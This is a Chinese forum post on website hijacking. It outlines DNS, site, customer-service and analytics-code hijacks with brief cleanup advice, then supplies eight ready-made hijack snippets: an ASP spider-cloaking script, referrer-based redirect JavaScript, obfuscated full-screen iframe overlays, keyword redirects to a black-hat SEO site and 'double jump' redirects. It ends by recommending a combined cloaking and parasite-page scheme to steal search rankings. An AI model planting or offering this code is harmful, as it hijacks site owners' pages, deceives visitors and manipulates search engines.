本帖最后由 bete68.com 于 2019-3-21 15:01 编辑
1:域名dns劫持dns劫持是通过全国各地的dns运营商,如果你搞定了机房管理员,就可以任意跳转或者分时段、分关键词、指定网址跳倒你想要的网址。当然各省、市的dns运营商不同,如果有人说可以劫持全省dns流量,还是有可信度的。如果他要说全国dns劫持,100%是骗子!没有任何一个人可以搞定全国所有地区的几十个运营商,本身就是一个违规的操作,需要私下谈妥。难道全国所有省的机房管理员都愿意陪着你玩心跳? 2:网站劫持网站劫持一般都是通过网站程序漏洞或者服务器系统漏洞从而拿到网站或者服务器权限,然后再网站添加JS跳转代码从而实现网站劫持。网站劫持代码等下在下方分享出来。 3:客服系统劫持客服系统有很多网站都会添加第三方的客服代码,然后某些第三方客服系统的内部人员内外勾结,提供把客户的咨询加载给别人的服务。当然不能排除第三方客服系统的网站被入侵的可能性。 4:网站统计代码劫持网站的统计代码跟第三方客服一样都是需要在自己网站上添加一个外部域名代码的,原理也跟客服劫持一样。曾经cnzz被收购之前就被爆出有通过统计代码劫持别人网站流量的丑闻。 二、网站劫持的应对策略和解决办法为了避免网站劫持,建议网站都要做https加密。如果网站被劫持,先判断出是哪类劫持,然后针对性的去处理修复。 1:ping检测全国测试如果发现网站某个省的解析IP跟其他省的不一致,证明网站被该地区的dns运营商劫持。 2:检查网站代码是否被劫持先从被跳转的页面检查代码,一般都是首页居多,网站是否加载了可疑的JS,挨个打开js查看js内容。下一步查看是否有被转码隐藏的内容,利用站长网的转码工具反向解析出来内容,如果是可疑代码直接清除。 3:检查第三方统计代码和客服代码检查第三方外部域名的代码内容是否有异常,如果有任何可疑的地方直接清除。或者可以暂时性的取消代码测试是否恢复。如果恢复可以确认为第三方的问题。 4:检查网页快照查看网站源码和搜索引擎快照是否一致,可以从快照里面查找到加载的跳转代码。 5:检查服务器如果检查网站和快照一切正常,那就是在服务器端直接判断跳转了,利用杀毒软件查杀网站目录下的可疑文件,检查iis、apache、nginx配置文件以及服务器配置设置。 三、常用网站劫持跳转代码1:网站快照劫持代码<%@ LANGUAGE = VBScript.Encode %><% Dim agentagent=Request.ServerVariables("http_user_agent")If instr(agent,"Baiduspider") > 0 or instr(agent,"baidubrowser") > 0 or instr(agent,"Sogou") > 0 or instr(agent,"googlebot") > 0 or instr(agent,"Sosospider") > 0 thenlinkurl="http://这里填网址" *快照网址Function GetBody(Url) Dim objXMLOn Error Resume NextSet objXML = CreateObject("Microsoft.XMLHTTP") With objXML .Open "Get", Url, False, "", "" .Send GetBody = .ResponseBodyEnd With GetBody=BytesToBstr(GetBody,"GB2312")Set objXML = Nothing End FunctionFunction BytesToBstr(strBody,CodeBase)dim objStreamset objStream = Server.CreateObject("Adodb.Stream")objStream.Type = 1objStream.Mode =3objStream.OpenobjStream.Write strBodyobjStream.Position = 0objStream.Type = 2objStream.Charset = CodeBaseBytesToBstr = objStream.ReadText objStream.Closeset objStream = nothingEnd Functionresponse.write GetBody(linkurl)End if%><script LANGUAGE="Javascript">var s=document.referrerif(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 ) location.href="这里填跳转地址";</script>
2:上方显示广告,下方显示原站内容document.writeln("<iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='100%' height='7350' allowTransparency src=http://这里填网址></iframe>");
3:全屏覆盖只能看到广告var ss = '<center id="showcloneshengxiaon"><ifr'+'ame scrolling="no" marginheight=0 marginwidth=0 frameborder="0" width="100%" width="14'+'00" height="50'+'50" src="http://这里填网址"></iframe></center>';eval("do"+"cu"+"ment.wr"+"ite('"+ss+"');"); try{ setInterval(function(){ try{ document.getElementById("div"+"All").style.display="no"+"ne"; }catch(e){} for(var i=0;i<document.body.children.length;i++){ try{ var tagname = document.body.children.tagName; var myid = document.body.children.id; if(myid!="iconDiv1" && myid!="showcloneshengxiaon"){ // if(tagname!="center"){ document.body.children.style.display="non"+"e"; //} } }catch(e){} } },100);}catch(e){}
4:搜索引擎来路直接跳JS代码document.writeln("<script LANGUAGE=\"Javascript\">");document.writeln("var s=document.referrer");document.writeln("if(s.indexOf(\"baidu\")>0 || s.indexOf(\"sogou\")>0 || s.indexOf(\"soso\")>0 ||s.indexOf(\"sm\")>0 ||s.indexOf(\"uc\")>0 ||s.indexOf(\"bing\")>0 ||s.indexOf(\"yahoo\")>0 ||s.indexOf(\"so\")>0 )");document.writeln("location.href=\"这里填网址\";");document.writeln("</script>");
5:根据不同关键词跳转不同的网址代码var title = window["document"]["title"];title = decodeURI(title);if(title.indexOf("\u9ed1\u5e3d") > -1){ jumpto("https://seotay.com/"); //根据上方的Unicode转码关键词黑帽跳转到这个网址} else if(title.indexOf("转码关键词") > -1){ jumpto("http://这里填网址");} else if(title.indexOf("转码关键词") > -1){ jumpto("http://这里填网址");} else if(title.indexOf("转码关键词") > -1){ jumpto("http://这里填网址");} else { jumpto("http://这里填无关键词跳转网址");}
6:打开网站标题正常,快照标题异常<title>转码后的标题,用于劫持快照</title><script>document.title='网站打开后浏览器显示的标题';</script>再添加一个判断搜索引擎跳转的JS配合使用
7:打开直接跳,不跳蜘蛛function jumurl(){ window.location.href = 'http://这里填网址'}setTimeout(jumurl,2000);jumurl();
8:双跳,打开跳两次ar d=document.referrer;if (d.indexOf("link?url")>0 || d.indexOf("%A8%B1")>0 || d.indexOf("%9F%8E")>0){self.location="http://这里填网址"; opener.location.href='http://这里是双跳网址'; }总结:任何东西都是死的,要做到活学活用,有个朋友把两个东西结合起来用,效果非常好。他的手法是利用首页快照劫持,判断如果是蜘蛛,返回寄生虫页面,生成/index.php?随机 /的伪首页文件,利用首页权重批量劫持排名。如果直接打开首页又是正常返回网站内容的。所以任何东西都需要自己的思路去创新,才能第一个吃螃蟹。有任何问题请在博路发论坛交流。
|
发表于 2019-3-21 14:59:43
收藏
发表于 2019-3-21 16:48:23
